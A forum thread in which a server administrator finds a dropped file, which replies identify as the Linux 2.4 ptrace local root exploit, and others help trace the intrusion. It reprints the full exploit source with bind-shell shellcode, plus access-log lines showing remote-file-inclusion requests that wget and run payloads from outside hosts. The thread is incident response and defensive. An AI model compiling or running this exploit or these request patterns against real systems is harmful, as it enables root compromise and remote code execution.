HI,
I have found /tmp/mptrace.c. We are running Red Hat 8 with kernel 2.4.20.
Did they attempt to hack us?
Any help is appreciated.
HI,
I have found /tmp/mptrace.c. We are running Red Hat 8 with kernel 2.4.20.
Did they attempt to hack us?
Any help is appreciated.
What are the contents of the file? The name of the file really means nothing.
Also, 2.4.21 is out. It includes a patch for the ptrace vulnerability if your current kernel isn't patched.
This is the code:
#include <stdio.h>
#include <fcntl.h>
#include <errno.h>
#include <string.h>
#include <stdlib.h>
#include <signal.h>
#include <sys/wait.h>
#include <sys/stat.h>
#include <sys/types.h>
#include <sys/ptrace.h>
#include <sys/socket.h>
#include <linux/user.h> /* For user_regs_struct */
#define SIZE (sizeof(shellcode)-1) /* payload length without the terminating NUL */
pid_t parent=0;   /* pid of the process that makes the vulnerable socket() call (set in main) */
pid_t child=0;    /* pid of the fork()ed attacking child */
pid_t k_child=0;  /* guessed pid of the kernel-spawned helper, taken as child+1 in main */
static int sigc=0; /* SIGCHLD counter: bumped by sigchld(), polled by main in busy loops */
/*
Port binding shellcode, courtesy of <anszom@v-lo.krakow.pl>
I just changed the port no..... =p
*/
char shellcode[]=
"\x31\xc0\x31\xdb\xb0\x17\xcd\x80\xb0\x2e\xcd\x80\x31\xc0\x50\x40"
"\x50\x40\x50\x8d\x58\xff\x89\xe1\xb0\x66\xcd\x80\x83\xec\xf4\x89"
"\xc7\x31\xc0\xb0\x04\x50\x89\xe0\x83\xc0\xf4\x50\x31\xc0\xb0\x02"
"\x50\x48\x50\x57\x31\xdb\xb3\x0e\x89\xe1\xb0\x66\xcd\x80\x83\xec"
"\xec\x31\xc0\x50\x66\xb8\x61\x2c\xc1\xe0\x10\xb0\x02\x50\x89\xe6"
"\x31\xc0\xb0\x10\x50\x56\x57\x89\xe1\xb0\x66\xb3\x02\xcd\x80\x83"
"\xec\xec\x85\xc0\x75\x59\xb0\x01\x50\x57\x89\xe1\xb0\x66\xb3\x04"
"\xcd\x80\x83\xec\xf8\x31\xc0\x50\x50\x57\x89\xe1\xb0\x66\xb3\x05"
"\xcd\x80\x89\xc3\x83\xec\xf4\x31\xc0\xb0\x02\xcd\x80\x85\xc0\x74"
"\x08\x31\xc0\xb0\x06\xcd\x80\xeb\xdc\x31\xc0\xb0\x3f\x31\xc9\xcd"
"\x80\x31\xc0\xb0\x3f\x41\xcd\x80\x31\xc0\xb0\x3f\x41\xcd\x80\x31"
"\xc0\x50\xeb\x13\x89\xe1\x8d\x54\x24\x04\x5b\xb0\x0b\xcd\x80\x31"
"\xc0\xb0\x01\x31\xdb\xcd\x80\xe8\xe8\xff\xff\xff/bin/sh";
/*
 * SIGCHLD handler.  Only increments the counter that main() polls to learn
 * that the traced process has stopped: once after PTRACE_ATTACH, a second
 * time after PTRACE_SYSCALL.  Nothing else is done in signal context.
 */
void sigchld() {
sigc++;
return;
}
/*
 * SIGALRM handler.  Fires when the 10-second alarm() armed in main() expires
 * (the attach loop or one of the signal-polling loops never completed);
 * prints a message and exits the process.
 */
void sigalrm() {
fprintf(stderr,"-> Something wrong and it timeout.\n");
exit(0);
}
/*
 * Entry point of the published Linux 2.4.x ptrace/kmod local privilege
 * escalation exploit that the replies in this thread identify (fixed in
 * 2.4.21 according to the thread).  It is a LOCAL exploit: it has to be
 * compiled and run from an existing shell on the box.  The domlog lines
 * pasted further down show how such a shell was obtained here (a PHP
 * include running wget), so the domlog search is the right place to look.
 *
 * Flow, as the original comments describe it:
 *   parent - makes a socket() call that causes the kernel to spawn a helper
 *            process with euid 0 / egid 0 (the "modprobe thread" named in
 *            the messages below).
 *   child  - guesses that helper's pid as its own pid + 1, retries
 *            PTRACE_ATTACH until the pid exists, waits for the stop, then
 *            writes the payload over the helper's code at its current eip,
 *            detaches and kills the parent.
 *
 * Defender notes:
 *   - a successful run leaves a root shell bound to TCP port 24876 (per the
 *     message printed below); `netstat -lntpe` and an nmap scan, both
 *     suggested in the thread, will show the listener.
 *   - a modprobe process running under the unprivileged user that ran the
 *     exploit (e.g. nobody) in `ps auxf` output is the artifact of the
 *     attach, as the reply below also points out.
 *   - mitigation is the patched kernel; deleting /tmp/mptrace.c does not
 *     undo a run that already succeeded.
 *   - argc/argv are unused: nothing is configurable at run time.
 */
main(int argc, char *argv[]) {
int i, error;
pid_t pid;
struct user_regs_struct regs; /* register snapshot of the traced process, filled by PTRACE_GETREGS */
parent=getpid();
switch (pid=fork()) {
case -1:
perror("Can't fork(): ");
break;
case 0: /* Child's thread -- The attacking thread. */
child=getpid();
k_child=child+1; /* Guessed pid of the kernel-spawned helper: assumes it is created right after us. */
fprintf(stderr, "-> Parent's PID is %d. Child's PID is %d.\n", p
arent, child);
fprintf(stderr, "-> Attaching to %d...", k_child);
/*
 * Try to attach to the child spawned by the kernel, which has both euid and
 * egid set to 0.  The attach sends it a SIGSTOP and we, the tracer, get a
 * SIGCHLD.  That is not immediate, so we have to wait before continuing or
 * we fail to control the process.  (Original comment, reflowed; the forum
 * paste had split it mid-word.)
 */
signal(SIGCHLD,sigchld);
signal(SIGALRM,sigalrm);
alarm(10);
/* Retry while the guessed pid does not exist yet (ESRCH); alarm(10) above bounds the spin. */
while ((error=ptrace(PTRACE_ATTACH,k_child,0,0)==-1) && (errno==
ESRCH)) {
fprintf(stderr, ".");
}
if (error==-1) {
fprintf(stderr,"-> Unable to attach to %d.\n",k_child);
exit(0);
}
fprintf(stderr, "\n-> Got the thread!!\n");
/*
 * Wait for the first SIGCHLD, which signals that the attach has completed.
 */
while(sigc<1);
if (ptrace(PTRACE_SYSCALL,k_child,0,0)==-1) {
fprintf(stderr,"-> Unable to setup syscall trace.\n");
exit(0);
}
/*
 * The process is under our control now.  Wait for the next stop (second
 * SIGCHLD) before writing the payload.
 */
fprintf(stderr,"-> Waiting for the next signal...\n");
while(sigc<2);
if (ptrace(PTRACE_GETREGS,k_child,NULL,®s)==-1) {
perror("-> Unable to read registers: ");
}
fprintf(stderr, "-> Injecting shellcode at 0x%08x\n",regs.eip);
/* Copy the payload, one PTRACE_POKETEXT word at a time, over the helper's text starting at its current eip. */
for (i=0; i<=SIZE; i+=4) {
if( ptrace(PTRACE_POKETEXT,k_child,regs.eip+i,*(int*)(sh
ellcode+i))) {}
}
fprintf(stderr, "-> Bind root shell on port 24876... =p\n");
/*
 * All done.  Leave the helper alone and get ready to kill ourselves.
 */
if (ptrace(PTRACE_DETACH,k_child,0,0)==-1) {
perror("-> Unable to detach from modprobe thread: ");
}
fprintf(stderr, "-> Detached from modprobe thread.\n");
fprintf(stderr, "-> Committing suicide.....\n");
/* SIGKILL the parent (which is still blocked in its socket() call). */
if (kill(parent,9)==-1) { /* This is really ugly..... */
perror("-> We survived??!!?? ");
}
/*
 * We should be dead by now.
 */
exit(0);
break;
default: /* Parent's thread -- The vulnerable call */
/*
 * The parent requests a feature served by a kernel module.  That makes the
 * kernel spawn a child with euid=0, egid=0 -- the process the attacking
 * child attaches to.  NB: see <linux/socket.h> for more info.
 */
signal(SIGALRM,sigalrm);
alarm(10);
socket(AF_SECURITY,SOCK_STREAM,1);
break;
}
exit(0);
}
That's the ptrace exploit code. If it was executed on your machine and you don't have a patched kernel, you're up sh*t's creek without a paddle, so to speak.
Are there any issues with cPanel and this version of the kernel?
Originally posted by ciphervendor:
What are the contents of the file? The name of the file really means nothing.
Also, 2.4.21 is out. It includes a patch for the ptrace vulnerability if your current kernel isn't patched.
How could I find out whether this has been executed? Any help would be appreciated.
thanks
Grep your users' domlogs to see where it came in from; if the file was owned by `nobody`, it will have been downloaded through an insecure PHP application.
Quick shell script to see where it came in from:
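#!/bin/sh
# Scan every Apache per-site access log for requests containing "wget" and
# collect the matches in a report file, so the download of a dropped file
# (here /tmp/mptrace.c) can be traced back to the vhost, source IP and URL.
#
# Usage: ./domlog-wget-scan.sh [DOMLOG_DIR] [REPORT_FILE]
#   DOMLOG_DIR   directory of per-site access logs
#                (default: /usr/local/apache/domlogs)
#   REPORT_FILE  file the matches are appended to (default: ./site-log)
#
# Each match is written with the originating log's name in front of it, so
# the report can be read on its own instead of pairing matches with the
# site marker that followed them in the original version.
domlog_dir=${1:-/usr/local/apache/domlogs}
report=${2:-site-log}

if [ ! -d "$domlog_dir" ]; then
    echo "$0: $domlog_dir is not a directory" >&2
    exit 1
fi

# Iterate with a glob instead of parsing `ls` output, so log names containing
# spaces or glob characters are handled; the -f test skips an unmatched glob
# (which the shell leaves as the literal pattern) and subdirectories.
for log in "$domlog_dir"/*; do
    [ -f "$log" ] || continue
    site=${log##*/}
    # Passing /dev/null as a second file makes POSIX grep prefix every hit
    # with the file name (no GNU -H needed).  Exit status 1 only means "no
    # match", which is the expected result for most sites, so it is ignored.
    grep "wget" /dev/null "$log" >> "$report"
    echo "$site checked"
done
exit 0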
Execute that script, then read site-log afterwards; it will tell you what was downloaded and from where. You need to block the IP of the machine used for the download (usually a free host in Brazil). It would probably have been executed as well; you will see that in the URL you find in your domlogs. The usual entry point is a client's shoutbox application.
If you don't have a patched kernel, you may have been hacked already. Run nmap and look for open ports that shouldn't be there.
Also
`ps auxf` — look for processes running under the user "nobody", either a modprobe process or one named after the file you removed (e.g. ./kde).
Hope that helps.
Thanks for the script, you saved me oh so much time.
cp7# cat site-log | grep wget
grep "wget" /home2/usr/local/apache/domlogs/$site >> site-log
200.182.136.2 - - [14/Feb/2004:11:52:31 -0500] "GET /index2.php?page=http://portal1.homeigo.com/accounts/index_1.txt&cmd=wget HTTP/1.0" 200 15707 "-" "Opera/7.23 (Windows NT 5.1; U) [en]"
200.182.136.2 - - [14/Feb/2004:11:52:49 -0500] "GET /index2.php?page=http://portal1.homeigo.com/accounts/index_1.txt&cmd=wget%20-O%20/tmp/bbd%20http://portal1.homeigo.com/accounts/bbd HTTP/1.0" 200 15619 "-" "Opera/7.23 (Windows NT 5.1; U) [en]"
200.103.84.104 - - [14/Feb/2004:18:02:32 -0500] "GET /index2.php?page=http://www.freewebs.com/sexysuperstar13/five.php?&cmd=wget%20www.downloadsmil.hpg.com.br/cgi HTTP/1.1" 200 17398 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)"
200.103.84.104 - - [14/Feb/2004:18:03:14 -0500] "GET /index2.php?page=http://www.freewebs.com/sexysuperstar13/five.php?&cmd=cd%20tmp;wget%20www.downloadsmil.hpg.com.br/cgi HTTP/1.1" 200 17398 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)"
200.217.33.8 - - [14/Feb/2004:18:17:48 -0500] "GET /index2.php?page=http://www.freewebs.com/sexysuperstar13/five.php?&cmd=wget%20www.criminalsproject.hpg.com.br/bd HTTP/1.1" 200 17419 "-" "Mozilla/4.0 (compatible; MSIE 5.0; Windows 98; DigExt)"
200.217.33.8 - - [14/Feb/2004:18:18:33 -0500] "GET /index2.php?page=http://www.freewebs.com/sexysuperstar13/five.php?&cmd=wget%20www.criminalsproject.hpg.com.br/bd HTTP/1.1" 200 17419 "-" "Mozilla/4.0 (compatible; MSIE 5.0; Windows 98; DigExt)"
200.199.129.122 - - [14/Feb/2004:18:19:24 -0500] "GET /index2.php?page=http://www.freewebs.com/sexysuperstar13/five.php?&cmd=cd%20/tmp;wget%20http://planeta.terra.com.br/informatica/defacer/cgi;chmod%20777%20cgi;./cgi HTTP/1.1" 200 16790 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)"
Funny, all Brazilian IPs. Now the script is removed, I feel secure!
netstat -lntpe
is useful at times to match ports to executables